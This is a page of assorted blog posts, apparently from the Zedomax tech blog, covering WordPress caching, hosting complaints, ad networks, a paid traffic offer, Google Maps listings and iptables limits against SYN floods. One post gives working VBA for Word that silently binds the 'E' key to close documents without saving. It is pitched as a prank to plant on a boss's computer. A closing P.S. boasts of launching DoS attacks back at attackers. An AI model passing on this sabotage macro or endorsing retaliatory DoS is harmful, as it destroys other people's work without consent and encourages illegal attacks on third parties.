DIY Wordpress HACK - Upgrade from WP-Cache and Get WP-SuperCache for your Wordpress Blog
I was moving Bedzine, Keetsa, Sleepzine, Mattresszine, and Wagg.It to another server the other day and my WP-Cache kept stallin’ on me so I looked up go Google for a newer version. I found WP-SuperCache which is simply built on top of WP-Cache. Basically, the difference between the two is that the WP-SuperCache also creates a permanent page for pages that have no comments. There are some functionalities such as Lock-Down to help your server from going down in case you get Digged, Stumbled, or Slashdotted.
BTW, don’t use Aplus.Net for dedicated hosting, they had a downtime of almost 5 days! That’s worse than any shared hosting I’ve tried. The funny part is that, all our websites were down but Aplus.Net’s homepage wasnt’t. It explains how they prioritize their customers below their revenue. I’ve had similar experience with Cari.Net, our current host. But when our sites when down, their homepage went down too. Which makes another reason for them to make sure their servers up again. The downtime with Cari.Net wasn’t more than couple hours so I figure it was time for switch to Cari.Net and stop dealing with Aplus.Net. (Think about the time I wasted in moving those websites, changing DNS for the domain names, trying to cope with the new server enviroment. It’s headache and I am glad it’s stopped and our servers are purring.) We’ve got 3 dedicated servers now to run all the websites, costing us an arm and a leg every month. Order a review and help us keep this site live.
Download WP-Cache here:
Download and Install
- Remove any existing instances of WP Cache, as WP Super Cache is a drop in replacement. Don’t forget to delete the files wp-content/advanced-caching.php and wp-content/wp-cache-config.php.
- Download the newest version of the WP Super Cache plugin from the WordPress.org plugin db and follow the instructions contained in the readme.txt file. If you have installed WP-Cache before this shouldn’t be any more difficult.
- After installation, go to the WP Super Cache options page and set your desired cache time.
Why BlogRush will die and EntreCard will exponentially grow!
Here’s a quick post I did on the Net: (Digg It) Reason for this? I feel bitter about BlogRush about them saying crap about how people are cheating and on top it, I like this Graham Langdon guy, he’s a nice guy and a gentlemen. They are also giving out some free ads so why not enter?
I have been keeping a keen eye on the new project by creator of Million Dollar Wiki, Graham Langdon. His new EntreCard, a free widget for bloggers, allows bloggers to advertise and trade 125×125 pixel ads for free. The above is a Alexa web traffic charts comparing BlogRush and EntreCard. As you can see, BlogRush did get MASSIVE traffic in the beginning and slowly on its way downhill. On the other hand, EntreCard started very very SLOW, and seems to have caught up with BlogRush already. Once EntreCard gets out to even more bloggers, the viral effect will cause EntreCard to exponentially grow. Am I an EntreCard evangelist? Hell yes, because it’s a great advertising system built on great functionalities unlike BlogRush.
Now, you can see a close-up of what’s been happening between EntreCard and BlogRush in the last 4 weeks. I bet it won’t be more than 2 weeks before EntreCard eclipses BlogRush. What will happen to BlogRush? It will probably die and suffer massively while EntreCard “converts” BlogRush users to its own.
If you are a blogger and haven’t tried EntreCard, try it today. Our card is the one with One Buck Wiki and EntreWiki so, drop us a card!
Zedomax.Net Web Traffic Services - Buy 300 to 500 visitors of Web Traffic from Us!
Hey, now we are offering web traffic services on Zedomax.Net. We can bring you about 300 to 500 extra visitors per day. You can see an example of it on Mike’s post on Bloggin-Ads. How much? Just $200 for a month. You try it for 1 month and if you don’t get at least extra 10,000 visitors, we will refund your money.
If you need a jump start for your new blog or online e-store, we could probably do it free. But if you want us to do it right so you get residual traffic, paypal us $200 at max [at] zedomax.com and shoot us an email of your website URL. We will try to keep it low in the beginning, maybe something like $200 per month. That’s about 2 cents per visitor at 300 visitors per day. Not too shabby if you can’t figure out how to get traffic to your site. We will even add you to blogroll on Zedomax.com as an extra bonus. (That’s over 6000 pages of SEO links!)
New Logo for Zedomax Network!

Guess what I did all day today? I made a new logo for Zedomax Network. Actually the logo itself isn’t new. I made the logo when I was 9. (That’s almost 20 years ago!)
I just put slightly different colors to it. Well, any comments on it appreciated. Bring ‘em on!
I am really trying to monetize this blog lately due to my recent joblessness. I will be incorporating soon so that’d be good for taxes, huh?
Check out the new paid wiki services we provide here. I am also working on this new site with a Berkeley professor and my Real Estate friend Josh, but maybe I shouldn’t tell anybody yet. Shhh… don’t tell anyone yet.
I need to hire people but don’t have that much money, anyone wanna guest blog? Lol…you know that was a joke right? Well, not the guest blog part. If anyone wants to guest blog, send your article and images to zedomax [at] gmail.com. (You gotta be a blogger though.)
P.S. Check out our latest web traffic, we are getting over 450K visitors per month! Too bad, I am not so marketing savvy like John Chow but gettin’ there…
I think we are going to start posting more on making money online and how to monetize your blog. Well, not on here, but on Zedomax.Biz. check it out if you haven’t. I made it so I can say some ramblings on how to make money online. It’s not going well because I am always jumping from blog to blog constantly but will try to post at least one per day. It’s actually a blog/social network made using Wordpress and Pligg. Go figure, huh?
DIY HACK - PRANK on your boss’s Microsoft Excel if you don’t like him
Joe from HackNMod sent this hack where you can automatically close Microsoft Word when you victim type ‘E’. Just don’t blame me if you get fired. If you do get fired, you can start making whole bunch of paid wikis like me.
Check out the directions here:
What is the most common letter in the English language? E right? Well, what would you do if every time you typed “E” in Microsoft Word, it closed your word document and didn’t save any of your work. Well you might throw your computer out the window and kill who ever did it to you. So hell lets do it right?
Step 1: Open up Micro Soft Word
Step2: Press alt F11, this will open up a vba editor for word.
Step3: In project window on the left there should be a title “Normal” this is your default template. Select the default document underneath it.
Step4: Copy and past this code into the document (Remember to re type all quotations)
Sub AddKeyBinding()
CustomizationContext = NormalTemplate
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyE), KeyCategory:=wdKeyCategoryCommand, _
Command:=”TestKeybinding”
End SubSub TestKeybinding()
Dim x As Document
Set x = ActiveDocument
x.Close (False)
End SubStep5: Close word
Step6: Enjoy
If you did this correctly the next time they load word this code will be loaded. What it will do is every time the key “E” is pressed, it will close the document and NOT SAVE. You can change the key to anything you like and below I have listed some different key options. Have fun and unleash hell.
DIY - HOW TO add your business to Google Maps!
Do you have a business? Whether you have a Mattress Store or other goods and services to sell, you can list yourself on Google Maps. What does this do for you?
Basically, everytime someone searches for a Business on GoogleMaps, you are likely to pop up first if you are near by that location. This could be very good for free advertising since a lot of people have been using Google Maps on their phones to navigate through today’s traffic and find places fast.
Personally, I use a Blackberry 8830 that comes with GPS so I can use Google Maps and press 0, which takes me to my current location. A lot of times, I search for banks or restaurants nearby while I am driving. I’ve saved so much time with this nifty phone and GoogleMaps. But you CAN get your business listed. It’s very simple.
Think about how many people use Google Maps everyday on their GPS enabled phones to find businesses or restaurants. If you are not listed, you are probably missing out on at least 1,000 impressions a day for free advertising through GoogleMaps.
Here’s the directions on how to get yourself listed: (Follow the link and then follow the directions)
Add your business as a Local Business on GoogleMaps
Yes, it’s as simple as entering your business information and verifying it with an automated phone call from Google. If this post helped you, make sure to check out the new Quarter Wiki and the EntreWiki.
Here’s our business listed on Google Maps if you type, “Zedomax” on Google Maps: (Now I tell my friends to type “zedomax” on their phone to find my apartment)

DIY Linux DoS HACK - HOWTO Limit your the max number of TCP connections to your Web Server!
I have been reading the following book called, Linux Server Hacks, which shows you many ways you can hack your Linux server so your server doesn’t die.
This actually works since we just had a DoS attack about 5 minutes ago. (It seems like we are getting more and more DoS attacks these days. You can refer to the DDOS Deflate script also)
Here’s HACK #47 I read about last week in my bath room from the book and I just used it to prevent DoS attackers from bringing my precious Quad-CPU dedicated server down.
Enter the following commands and you will limit number of TCP connections to your server to 12 connections per second after 24 connections have been seen. (It means that no matter what, your server will not try to serve more than 12 visitors during one second of period when your server gets digged, farked, stumbled, or whatever)
iptables -t nat -N syn-flood
iptables -t nat -A syn-flood -m limit —limit 12/s —limit-burst 24 -j RETURN
iptables -t nat -A syn-flood -j DROP
iptables -t nat -A PREROUTING -i $EXT_IFACE -d $DEST_IP -p tcp –syn -j syn-flood
I think you can increase the values steadily if your server can handle more. But it seems to have brought our server load from 33.00 somethin’ to under 1.0. Yey!
If you are a hacker, sorry dude. You are gonna have to try a little harder hacking Zedomax since we are hackers too.
P.S. You know what I try to do when I find out where the hackers are coming from, I do a DoS attack back on them. This usually pisses them off enough to DoS me more but I kinda enjoy the battle so bring it on! :p
